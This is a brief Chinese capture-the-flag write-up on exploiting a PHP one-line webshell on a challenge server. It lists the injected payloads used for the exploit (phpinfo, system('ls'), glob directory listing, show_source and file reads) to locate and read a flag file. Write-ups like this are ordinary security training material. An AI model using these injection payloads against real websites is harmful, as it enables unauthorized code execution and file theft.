[Writeup] “过狗一句话”解题思路

小帅帅 17293 0

上来就给出了一句话 猜想是直接利用一句话 于是构造payload

http://120.24.86.145:8010/index.php?s=phpinfo();

发现成功执行。于是尝试能否执行cmd命令

http://120.24.86.145:8010/index.php?s=system('ls');

发现返回空白页面 没有任何信息说明执行失败,这里猜想是权限被控制了于是用另一种方法来读取文件

http://120.24.86.145:8010/index.php?s=print_r(glob('*.php'));

发现只回显了一个index.php页面于是修改后缀

http://120.24.86.145:8010/index.php?s=print_r(glob('*.txt')); 发现有一个txt文件于是尝试读取

http://120.24.86.145:8010/index.php?s=show_source('ds231e.txt');

成功getflag

这里可以用其他方式读取 :

var_dump(file("./ds231e.txt"));

print_r(file("./ds231e.txt"));

注:glob() 函数返回匹配指定模式的文件名或目录。该函数返回一个包含有匹配文件 / 目录的数组。

热门推荐:

seo人员添加外链的时候需要注意哪些影响?

百度没死!真正逝去的,是曾经那个你熟悉的“度娘”......

今日大暑,热҈得҈字҈都҈冒汗҈了҈

曝荣耀智慧屏将在华为开发者大会发布,很可能配鸿蒙系统

中国移动研究院院长:到年底在50城建5万个5G基站

微软Cortana(Beta)Windows 10版独立App功能已激活

深圳SEO算法:什么是天网算法分析,天网算法对网站SEO的影响

小米潜望式镜头专利曝光

蚂蚁森林被外国App山寨?支付宝:误会一场,都是兄弟

SEO新站怎么优化,SEO优化做新站的步骤

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~